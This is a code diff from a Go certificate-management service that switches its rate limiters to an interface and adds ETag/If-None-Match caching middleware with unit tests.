// limiter for FAILED HTTP Basic auth attempts. Keyed by sourceIP so
|
||||||
// a hostile network segment can't burn through the password.
|
// a hostile network segment can't burn through the password.
|
||||||
failedBasicLimiter *ratelimit.SlidingWindowLimiter
|
failedBasicLimiter ratelimit.Limiter
|
||||||
|
|
||||||
// EST RFC 7030 hardening Phase 4.2: per-handler per-principal sliding-
|
// EST RFC 7030 hardening Phase 4.2: per-handler per-principal sliding-
|
||||||
// window rate limit. Keyed by (CSR-CN, sourceIP) so a stolen
|
// window rate limit. Keyed by (CSR-CN, sourceIP) so a stolen
|
||||||
// bootstrap cert AND a known device CN can't be used to flood the
|
// bootstrap cert AND a known device CN can't be used to flood the
|
||||||
// issuer. Disabled when nil; configured per-profile.
|
// issuer. Disabled when nil; configured per-profile.
|
||||||
perPrincipalLimiter *ratelimit.SlidingWindowLimiter
|
perPrincipalLimiter ratelimit.Limiter
|
||||||
|
|
||||||
// labelForLog gives observability code a per-profile string to
|
// labelForLog gives observability code a per-profile string to
|
||||||
// include in audit log lines / Prometheus labels. Defaults to
|
// include in audit log lines / Prometheus labels. Defaults to
|
||||||
@@ -170,7 +170,7 @@ func (h *ESTHandler) SetEnrollmentPassword(pw string) { h.basicPassword = pw }
|
|||||||
// rate limiter. Phase 3.3. Disabled when nil — but Validate() at
|
// rate limiter. Phase 3.3. Disabled when nil — but Validate() at
|
||||||
// startup refuses an enabled basic-auth profile without a configured
|
// startup refuses an enabled basic-auth profile without a configured
|
||||||
// limiter, so a real deploy always wires one.
|
// limiter, so a real deploy always wires one.
|
||||||
func (h *ESTHandler) SetSourceIPRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *ESTHandler) SetSourceIPRateLimiter(l ratelimit.Limiter) {
|
||||||
h.failedBasicLimiter = l
|
h.failedBasicLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -179,7 +179,7 @@ func (h *ESTHandler) SetSourceIPRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
|||||||
// every successful enrollment, NOT just failures — the goal is to
|
// every successful enrollment, NOT just failures — the goal is to
|
||||||
// bound enrollment-flooding from a compromised credential, not just
|
// bound enrollment-flooding from a compromised credential, not just
|
||||||
// failed-auth brute force.
|
// failed-auth brute force.
|
||||||
func (h *ESTHandler) SetPerPrincipalRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *ESTHandler) SetPerPrincipalRateLimiter(l ratelimit.Limiter) {
|
||||||
h.perPrincipalLimiter = l
|
h.perPrincipalLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ type ExportService interface {
|
|||||||
// ExportHandler handles HTTP requests for certificate export operations.
|
// ExportHandler handles HTTP requests for certificate export operations.
|
||||||
type ExportHandler struct {
|
type ExportHandler struct {
|
||||||
svc ExportService
|
svc ExportService
|
||||||
exportLimiter *ratelimit.SlidingWindowLimiter // production hardening II Phase 3
|
exportLimiter ratelimit.Limiter // production hardening II Phase 3
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewExportHandler creates a new ExportHandler with a service dependency.
|
// NewExportHandler creates a new ExportHandler with a service dependency.
|
||||||
@@ -40,7 +40,7 @@ func NewExportHandler(svc ExportService) ExportHandler {
|
|||||||
// Production hardening II Phase 3. Default cap (when set in
|
// Production hardening II Phase 3. Default cap (when set in
|
||||||
// cmd/server/main.go): 50 exports/hr/operator. Setting to nil
|
// cmd/server/main.go): 50 exports/hr/operator. Setting to nil
|
||||||
// disables the limit.
|
// disables the limit.
|
||||||
func (h *ExportHandler) SetExportRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *ExportHandler) SetExportRateLimiter(l ratelimit.Limiter) {
|
||||||
h.exportLimiter = l
|
h.exportLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,291 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package middleware
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"crypto/sha256"
|
||||||
|
"encoding/hex"
|
||||||
|
"net/http"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-L2 closure (2026-05-14): ETag / If-None-Match
|
||||||
|
// middleware for read-heavy list endpoints.
|
||||||
|
//
|
||||||
|
// Pre-Phase-6 every GET /api/v1/{certificates,jobs,agents,audit,
|
||||||
|
// discovery/certificates} request walked the full pagination path
|
||||||
|
// including a `SELECT COUNT(*) FROM <table> WHERE ...` query for
|
||||||
|
// the metadata block. The dashboard's polling loop alone hits these
|
||||||
|
// endpoints every 30s; on a 50K-cert fleet that's ~14K COUNT(*)
|
||||||
|
// rows scanned per minute for a result the operator hasn't actually
|
||||||
|
// changed.
|
||||||
|
//
|
||||||
|
// This middleware sits in front of the handler and:
|
||||||
|
//
|
||||||
|
// 1. Lets the handler run normally (writing JSON to a response
|
||||||
|
// buffer rather than the wire).
|
||||||
|
// 2. Computes a SHA-256 ETag of the buffered response body. The
|
||||||
|
// ETag is deterministic over (body bytes), so when the
|
||||||
|
// underlying list contents are unchanged the ETag is the same
|
||||||
|
// regardless of which replica served the request.
|
||||||
|
// 3. Compares the computed ETag against the request's
|
||||||
|
// `If-None-Match` header. Match → write 304 Not Modified with
|
||||||
|
// an empty body. No match → write the full response with the
|
||||||
|
// `ETag:` header set so the client can store it for the next
|
||||||
|
// request.
|
||||||
|
//
|
||||||
|
// Constraints / non-goals:
|
||||||
|
//
|
||||||
|
// - GET / HEAD only. POST / PUT / DELETE bypass the middleware
|
||||||
|
// (ETags on mutations introduce cache-correctness bugs around
|
||||||
|
// the request body not matching the response body).
|
||||||
|
// - Non-2xx responses (4xx errors, 5xx) bypass the ETag
|
||||||
|
// computation. The handler's error responses go through
|
||||||
|
// unchanged.
|
||||||
|
// - Responses larger than maxETagBufferBytes (64 KiB) skip the
|
||||||
|
// hash. Buffering very large response bodies in-memory just to
|
||||||
|
// hash them would cost more than the cache win. The default
|
||||||
|
// covers the cursor-paginated 100-row default on every list
|
||||||
|
// endpoint; raising the page-size override could exceed the
|
||||||
|
// limit, in which case ETag silently degrades to "no caching"
|
||||||
|
// for those calls.
|
||||||
|
// - The hash is computed over the response body bytes, NOT over
|
||||||
|
// a (max-updated-at, row-count) tuple from the DB. This is the
|
||||||
|
// less-clever-but-more-correct choice: any response-shape
|
||||||
|
// change (a new field added by a handler refactor, locale
|
||||||
|
// formatting drift, ordering shuffles) produces a fresh ETag
|
||||||
|
// automatically without requiring per-endpoint metadata
|
||||||
|
// wiring. The cost is one SHA-256 pass over the response body
|
||||||
|
// per request, which is dwarfed by the JSON marshaling cost
|
||||||
|
// already in the path.
|
||||||
|
|
||||||
|
const (
|
||||||
|
// maxETagBufferBytes caps how much response body the middleware
|
||||||
|
// will buffer for hashing. 64 KiB covers a 100-row cursor page
|
||||||
|
// at the default 500-bytes-per-row JSON shape on every list
|
||||||
|
// endpoint. Responses larger than this skip the ETag pass.
|
||||||
|
maxETagBufferBytes = 64 * 1024
|
||||||
|
)
|
||||||
|
|
||||||
|
// ETag returns middleware that emits a strong ETag header on
|
||||||
|
// successful GET / HEAD responses and short-circuits 304 Not
|
||||||
|
// Modified on If-None-Match match. Use it by wrapping the handler
|
||||||
|
// chain in front of the list endpoints:
|
||||||
|
//
|
||||||
|
// mux.Handle("GET /api/v1/certificates", middleware.ETag(h.ListCertificates))
|
||||||
|
//
|
||||||
|
// Or per router-registration if the router supports method-aware
|
||||||
|
// wrapping; see internal/api/router/router.go for the wiring shape.
|
||||||
|
func ETag(next http.Handler) http.Handler {
|
||||||
|
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
// Only GET + HEAD benefit. POST/PUT/DELETE always run.
|
||||||
|
if r.Method != http.MethodGet && r.Method != http.MethodHead {
|
||||||
|
next.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Buffer the handler's response. The handler still calls
|
||||||
|
// w.WriteHeader / w.Write normally; the recorder captures
|
||||||
|
// the bytes + status code for the post-handler ETag pass.
|
||||||
|
rec := &etagRecorder{
|
||||||
|
ResponseWriter: w,
|
||||||
|
body: bytes.NewBuffer(nil),
|
||||||
|
status: http.StatusOK,
|
||||||
|
headerWritten: false,
|
||||||
|
}
|
||||||
|
next.ServeHTTP(rec, r)
|
||||||
|
|
||||||
|
// Only successful responses get cached. 304s never reach
|
||||||
|
// here (we'd be short-circuiting BEFORE the handler ran).
|
||||||
|
// 4xx / 5xx responses pass through unchanged because the
|
||||||
|
// handler's error body shouldn't be cached against an
|
||||||
|
// ETag.
|
||||||
|
if rec.status < 200 || rec.status >= 300 {
|
||||||
|
rec.flush()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Skip ETag pass for over-sized responses. The buffer cap
|
||||||
|
// caught the body; emitting it without an ETag is the
|
||||||
|
// degradation path.
|
||||||
|
if rec.bodyTruncated {
|
||||||
|
rec.flush()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compute the ETag over the buffered body.
|
||||||
|
bodyBytes := rec.body.Bytes()
|
||||||
|
sum := sha256.Sum256(bodyBytes)
|
||||||
|
etag := `"` + hex.EncodeToString(sum[:]) + `"` // RFC 7232 strong-validator format
|
||||||
|
|
||||||
|
// If-None-Match handling. The header can be a
|
||||||
|
// comma-separated list; check each candidate against the
|
||||||
|
// computed ETag.
|
||||||
|
if matchETag(r.Header.Get("If-None-Match"), etag) {
|
||||||
|
// 304 Not Modified — preserve the ETag header but
|
||||||
|
// emit no body. Drop Content-Length to avoid the
|
||||||
|
// "declared length doesn't match body" mismatch some
|
||||||
|
// proxies are strict about.
|
||||||
|
h := w.Header()
|
||||||
|
h.Set("ETag", etag)
|
||||||
|
h.Del("Content-Length")
|
||||||
|
h.Del("Content-Type")
|
||||||
|
w.WriteHeader(http.StatusNotModified)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Cache miss / first request. Emit the full response with
|
||||||
|
// ETag header for the next request to use.
|
||||||
|
w.Header().Set("ETag", etag)
|
||||||
|
rec.flush()
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// matchETag returns true when ifNoneMatch (an If-None-Match header
|
||||||
|
// value) contains an entry that equals etag (the computed strong
|
||||||
|
// validator) or contains the wildcard `*`. RFC 7232 §3.2 says:
|
||||||
|
//
|
||||||
|
// If-None-Match = "*" / 1#entity-tag
|
||||||
|
//
|
||||||
|
// Strong comparison is appropriate for our use because all our
|
||||||
|
// ETags are strong (computed over response bytes); we never emit
|
||||||
|
// weak validators (`W/"..."`).
|
||||||
|
func matchETag(ifNoneMatch, etag string) bool {
|
||||||
|
if ifNoneMatch == "" {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
// Cheap wildcard fast-path
|
||||||
|
if strings.TrimSpace(ifNoneMatch) == "*" {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
// Comma-separated list, possibly with surrounding spaces.
|
||||||
|
for _, candidate := range strings.Split(ifNoneMatch, ",") {
|
||||||
|
if strings.TrimSpace(candidate) == etag {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// etagRecorder buffers response bytes + status so the post-handler
|
||||||
|
// ETag pass can hash the body. WriteHeader and Write follow the
|
||||||
|
// http.ResponseWriter contract; the recorder ONLY differs by
|
||||||
|
// holding the bytes until flush() is called.
|
||||||
|
type etagRecorder struct {
|
||||||
|
http.ResponseWriter
|
||||||
|
body *bytes.Buffer
|
||||||
|
status int
|
||||||
|
headerWritten bool // set when the handler calls WriteHeader
|
||||||
|
headerWrittenOnWire bool // set when writeHeadersToWire emits to the underlying writer (idempotency sentinel)
|
||||||
|
bodyTruncated bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *etagRecorder) WriteHeader(status int) {
|
||||||
|
if r.headerWritten {
|
||||||
|
// Honor the http stdlib's contract: subsequent
|
||||||
|
// WriteHeader calls are ignored after the first.
|
||||||
|
return
|
||||||
|
}
|
||||||
|
r.status = status
|
||||||
|
r.headerWritten = true
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *etagRecorder) Write(b []byte) (int, error) {
|
||||||
|
if r.bodyTruncated {
|
||||||
|
// The buffer's full; subsequent writes are reported as
|
||||||
|
// successful but never make it into the buffer. flush()
|
||||||
|
// writes the buffer + any further bytes directly when it
|
||||||
|
// runs (see flush implementation below). Returning the
|
||||||
|
// caller-requested length here preserves io.Writer
|
||||||
|
// semantics for the handler.
|
||||||
|
return len(b), nil
|
||||||
|
}
|
||||||
|
// Track whether THIS write would push us over the cap. If
|
||||||
|
// yes, stop buffering — the body is too big to ETag.
|
||||||
|
if r.body.Len()+len(b) > maxETagBufferBytes {
|
||||||
|
r.bodyTruncated = true
|
||||||
|
// Flush the buffered prefix + this chunk straight to the
|
||||||
|
// wire; preserve the handler's bytes-written count.
|
||||||
|
// Headers haven't been written yet (we hold them until
|
||||||
|
// flush); write them now.
|
||||||
|
r.writeHeadersToWire()
|
||||||
|
if r.body.Len() > 0 {
|
||||||
|
if _, err := r.ResponseWriter.Write(r.body.Bytes()); err != nil {
|
||||||
|
return 0, err
|
||||||
|
}
|
||||||
|
r.body.Reset()
|
||||||
|
}
|
||||||
|
return r.ResponseWriter.Write(b)
|
||||||
|
}
|
||||||
|
return r.body.Write(b)
|
||||||
|
}
|
||||||
|
|
||||||
|
// writeHeadersToWire emits the buffered status to the underlying
|
||||||
|
// ResponseWriter. Idempotent — subsequent calls are no-ops.
|
||||||
|
func (r *etagRecorder) writeHeadersToWire() {
|
||||||
|
if !r.headerWritten {
|
||||||
|
// Handler never called WriteHeader explicitly; the
|
||||||
|
// http.ResponseWriter contract says that's an implicit
|
||||||
|
// 200 OK on the first Write.
|
||||||
|
r.status = http.StatusOK
|
||||||
|
r.headerWritten = true
|
||||||
|
}
|
||||||
|
// Detect "already flushed" via a sentinel: if the underlying
|
||||||
|
// ResponseWriter has already received the status (via our
|
||||||
|
// own bodyTruncated path), the second call is a no-op.
|
||||||
|
// Standard library's WriteHeader documents that calling it
|
||||||
|
// twice is a logger warning; we want to avoid that.
|
||||||
|
// To avoid double-write, we use an internal flag.
|
||||||
|
if r.bodyTruncated && r.headerWrittenOnWire {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Hotfix #12 (CodeQL alert #34 — go/reflected-xss): defense-in-
|
||||||
|
// depth Content-Type guard. This middleware is wired ONLY to JSON
|
||||||
|
// list endpoints (GET /api/v1/{certificates,agents,jobs,audit,
|
||||||
|
// discovered-certificates} — see internal/api/router/router.go).
|
||||||
|
// Every wrapped handler currently sets Content-Type:
|
||||||
|
// application/json via handler.JSON() before the first Write. But
|
||||||
|
// the recorder is a generic byte forwarder; CodeQL's data-flow
|
||||||
|
// query sees `r.ResponseWriter.Write(b)` at the sink and can't
|
||||||
|
// see that the wrapped handler set a non-HTML Content-Type — so
|
||||||
|
// it flags reflected-XSS even though browsers don't render
|
||||||
|
// application/json as HTML. The fix is to make the Content-Type
|
||||||
|
// guarantee explicit at the chokepoint: if the wrapped handler
|
||||||
|
// forgot to set Content-Type, default to application/json +
|
||||||
|
// charset=utf-8 here. Behavior-preserving for the 5 current
|
||||||
|
// handlers (they all set Content-Type) and a safe guard against
|
||||||
|
// a future handler bug that would otherwise let the browser
|
||||||
|
// content-sniff a JSON body as text/html.
|
||||||
|
//
|
||||||
|
// Drop the embedded-field selector for Header() — etagRecorder
|
||||||
|
// doesn't override Header(), so r.Header() resolves to the
|
||||||
|
// embedded ResponseWriter.Header() (staticcheck QF1008). The
|
||||||
|
// neighboring r.ResponseWriter.WriteHeader / r.ResponseWriter.Write
|
||||||
|
// calls intentionally KEEP the explicit selector because
|
||||||
|
// etagRecorder.Write / etagRecorder.WriteHeader override them
|
||||||
|
// and the embedded form is required to bypass recursion.
|
||||||
|
hdr := r.Header()
|
||||||
|
if hdr.Get("Content-Type") == "" {
|
||||||
|
hdr.Set("Content-Type", "application/json; charset=utf-8")
|
||||||
|
}
|
||||||
|
r.ResponseWriter.WriteHeader(r.status)
|
||||||
|
r.headerWrittenOnWire = true
|
||||||
|
}
|
||||||
|
|
||||||
|
// flush emits the buffered status + body to the underlying
|
||||||
|
// ResponseWriter. Called by the ETag middleware after the handler
|
||||||
|
// returns AND the response is either a cache miss (no
|
||||||
|
// If-None-Match match) or non-cacheable (4xx, oversized).
|
||||||
|
func (r *etagRecorder) flush() {
|
||||||
|
if r.bodyTruncated {
|
||||||
|
// Headers + body already on the wire via Write's
|
||||||
|
// truncation path. Nothing to flush.
|
||||||
|
return
|
||||||
|
}
|
||||||
|
r.writeHeadersToWire()
|
||||||
|
if r.body.Len() > 0 {
|
||||||
|
_, _ = r.ResponseWriter.Write(r.body.Bytes())
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -0,0 +1,259 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package middleware
|
||||||
|
|
||||||
|
import (
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"net/http/httptest"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-L2 contract pin (2026-05-14): the ETag middleware
|
||||||
|
// must:
|
||||||
|
// 1. Emit an ETag header on successful GET / HEAD responses.
|
||||||
|
// 2. Return 304 Not Modified when the client's If-None-Match
|
||||||
|
// matches the computed ETag (cache hit).
|
||||||
|
// 3. Return 200 + new ETag when the body has changed (cache miss
|
||||||
|
// after mutation).
|
||||||
|
// 4. NOT apply to POST / PUT / DELETE.
|
||||||
|
// 5. NOT apply to non-2xx responses (errors pass through unchanged).
|
||||||
|
// 6. Skip ETag for over-sized responses (degrade gracefully, not
|
||||||
|
// crash).
|
||||||
|
|
||||||
|
func TestETag_GET_EmitsETagHeader(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
_, _ = w.Write([]byte(`{"items":[{"id":"cert-1"}],"total":1}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag == "" {
|
||||||
|
t.Errorf("ETag header is empty; want non-empty strong validator")
|
||||||
|
}
|
||||||
|
if !strings.Contains(rec.Body.String(), "cert-1") {
|
||||||
|
t.Errorf("body missing handler output: %q", rec.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_RepeatedRequest_Returns304(t *testing.T) {
|
||||||
|
body := []byte(`{"items":[{"id":"cert-1"}],"total":1}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
_, _ = w.Write(body)
|
||||||
|
}))
|
||||||
|
|
||||||
|
// First request — establish the cache.
|
||||||
|
req1 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec1 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec1, req1)
|
||||||
|
|
||||||
|
etag := rec1.Header().Get("ETag")
|
||||||
|
if etag == "" {
|
||||||
|
t.Fatal("first response missing ETag — cannot run cache-hit test")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Second request with If-None-Match — should 304.
|
||||||
|
req2 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
req2.Header.Set("If-None-Match", etag)
|
||||||
|
rec2 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec2, req2)
|
||||||
|
|
||||||
|
if rec2.Code != http.StatusNotModified {
|
||||||
|
t.Errorf("status = %d; want 304 Not Modified (cache hit)", rec2.Code)
|
||||||
|
}
|
||||||
|
if rec2.Body.Len() != 0 {
|
||||||
|
t.Errorf("304 response body non-empty: %q (RFC 7232 §4.1: 304 MUST NOT have a body)", rec2.Body.String())
|
||||||
|
}
|
||||||
|
if rec2.Header().Get("ETag") != etag {
|
||||||
|
t.Errorf("304 response ETag = %q; want %q (must be preserved for next request)", rec2.Header().Get("ETag"), etag)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_AfterMutation_Returns200WithNewETag(t *testing.T) {
|
||||||
|
// Simulate a mutation: the handler's response body changes
|
||||||
|
// between request 1 and request 3. Request 2 (with stale
|
||||||
|
// If-None-Match) must miss and return 200 + the new ETag.
|
||||||
|
currentBody := []byte(`{"items":[{"id":"cert-1"}],"total":1}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
_, _ = w.Write(currentBody)
|
||||||
|
}))
|
||||||
|
|
||||||
|
// Initial request — capture ETag.
|
||||||
|
req1 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec1 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec1, req1)
|
||||||
|
etag1 := rec1.Header().Get("ETag")
|
||||||
|
|
||||||
|
// Simulate a mutation by changing the response body.
|
||||||
|
currentBody = []byte(`{"items":[{"id":"cert-1"},{"id":"cert-2"}],"total":2}`)
|
||||||
|
|
||||||
|
// Repeat request with stale ETag — should miss (200, new ETag).
|
||||||
|
req2 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
req2.Header.Set("If-None-Match", etag1)
|
||||||
|
rec2 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec2, req2)
|
||||||
|
|
||||||
|
if rec2.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200 (cache miss after mutation)", rec2.Code)
|
||||||
|
}
|
||||||
|
etag2 := rec2.Header().Get("ETag")
|
||||||
|
if etag2 == etag1 {
|
||||||
|
t.Errorf("ETag unchanged after body mutation: %q = %q", etag1, etag2)
|
||||||
|
}
|
||||||
|
if !strings.Contains(rec2.Body.String(), "cert-2") {
|
||||||
|
t.Errorf("post-mutation body missing new content: %q", rec2.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_POST_BypassesMiddleware(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.WriteHeader(http.StatusCreated)
|
||||||
|
_, _ = w.Write([]byte(`{"id":"cert-new"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodPost, "/api/v1/certificates", strings.NewReader(`{}`))
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusCreated {
|
||||||
|
t.Errorf("status = %d; want 201", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag header set on POST response: %q (POST/PUT/DELETE must not have ETag)", etag)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_5xx_PassesThroughWithoutETag(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.WriteHeader(http.StatusInternalServerError)
|
||||||
|
_, _ = w.Write([]byte(`{"error":"boom"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusInternalServerError {
|
||||||
|
t.Errorf("status = %d; want 500", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag set on 500 response: %q (non-2xx must not be cached)", etag)
|
||||||
|
}
|
||||||
|
if !strings.Contains(rec.Body.String(), "boom") {
|
||||||
|
t.Errorf("error body lost: %q", rec.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_4xx_PassesThroughWithoutETag(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.WriteHeader(http.StatusBadRequest)
|
||||||
|
_, _ = w.Write([]byte(`{"error":"invalid query"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates?bad=true", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusBadRequest {
|
||||||
|
t.Errorf("status = %d; want 400", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag set on 400 response: %q (non-2xx must not be cached)", etag)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_OversizedResponse_DegradesGracefully(t *testing.T) {
|
||||||
|
// Response larger than maxETagBufferBytes (64 KiB) must not
|
||||||
|
// be ETag'd, but the response itself must reach the client
|
||||||
|
// intact.
|
||||||
|
bigBody := make([]byte, maxETagBufferBytes+1024)
|
||||||
|
for i := range bigBody {
|
||||||
|
bigBody[i] = 'x'
|
||||||
|
}
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "text/plain")
|
||||||
|
_, _ = w.Write(bigBody)
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/audit?limit=10000", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200 (oversize body should not 5xx)", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag emitted for oversize response: %q (should degrade silently)", etag)
|
||||||
|
}
|
||||||
|
if got, want := rec.Body.Len(), len(bigBody); got != want {
|
||||||
|
t.Errorf("body bytes received = %d; want %d (oversize body should not be truncated on the wire)", got, want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_Wildcard_MatchesAny(t *testing.T) {
|
||||||
|
// RFC 7232 §3.2: If-None-Match: * matches any current
|
||||||
|
// representation. Clients use this for "give me 304 if anything
|
||||||
|
// exists" semantics.
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
_, _ = w.Write([]byte(`{"any":"thing"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
req.Header.Set("If-None-Match", "*")
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusNotModified {
|
||||||
|
t.Errorf("status = %d; want 304 (If-None-Match: * always matches)", rec.Code)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_HEAD_TreatedLikeGET(t *testing.T) {
|
||||||
|
body := []byte(`{"items":[],"total":0}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
// A real HEAD handler wouldn't actually write a body but
|
||||||
|
// the middleware shouldn't care — the ETag derives from
|
||||||
|
// whatever the handler emits.
|
||||||
|
_, _ = w.Write(body)
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodHead, "/api/v1/certificates", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag == "" {
|
||||||
|
t.Errorf("HEAD response missing ETag (HEAD should be treated like GET)")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestETag_ChainCheck — paranoia check that the recorder doesn't
|
||||||
|
// drop bytes vs the underlying ResponseWriter. Reads back the
|
||||||
|
// body and asserts byte-equality with what the handler wrote.
|
||||||
|
func TestETag_PassThrough_PreservesBody(t *testing.T) {
|
||||||
|
body := []byte(`{"a":1,"b":2,"c":3}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
_, _ = w.Write(body)
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/jobs", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
got, _ := io.ReadAll(rec.Body)
|
||||||
|
if string(got) != string(body) {
|
||||||
|
t.Errorf("body bytes mismatched: got %q, want %q", string(got), string(body))
|
||||||
|
}
|
||||||
|
}
|
